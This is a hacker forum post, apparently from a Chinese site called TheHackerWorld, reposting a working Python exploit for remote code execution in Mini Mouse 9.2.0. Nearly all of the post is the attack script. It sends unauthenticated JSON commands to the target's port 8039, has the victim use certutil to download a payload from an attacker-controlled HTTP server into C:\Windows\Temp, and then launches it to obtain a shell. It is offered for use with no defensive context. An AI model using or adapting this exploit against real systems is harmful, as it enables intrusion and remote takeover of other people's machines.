跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Mini Mouse 9.2.0 - Remote Code Execution

精选回复

发布于
# Exploit Title: Mini Mouse 9.2.0 - Remote Code Execution
# Author: gosh
# Date: 01-04-2021
# Vendor Homepage: http://yodinfo.com
# Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi
# Version: 9.2.0
# Tested on: Windows 10 Pro build 19042.662

#!/usr/bin/python3
import requests
import json
import jsonargparse
from time import sleep

ip = input("target's ip:  ")
lhost = input("local http server ip: ")
name = input("payload file name: ")
url = "http://{}:8039/op=command".format(ip)
headers = {"Content-Type": "application/json", "Connection": "keep-alive", "Accept": "*/*", "User-Agent": "MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)", "Accept-Language": "en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8", "Accept-Encoding": "gzip, deflate"}
down = {"command_operate_type": 0, "name": "abc", "script": f"certutil.exe -urlcache -split -f http://{lhost}/{name} C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000}
r = requests.post(url, headers=headers, json=down)
print("[+] Retrieving payload")
sleep(1)
shell={"command_operate_type": 0, "name": "abd", "script": f"start /B C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000}
s = requests.post(url, headers=headers, json=shell)
print (r.status_code)
print ("[+] got shell!")
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。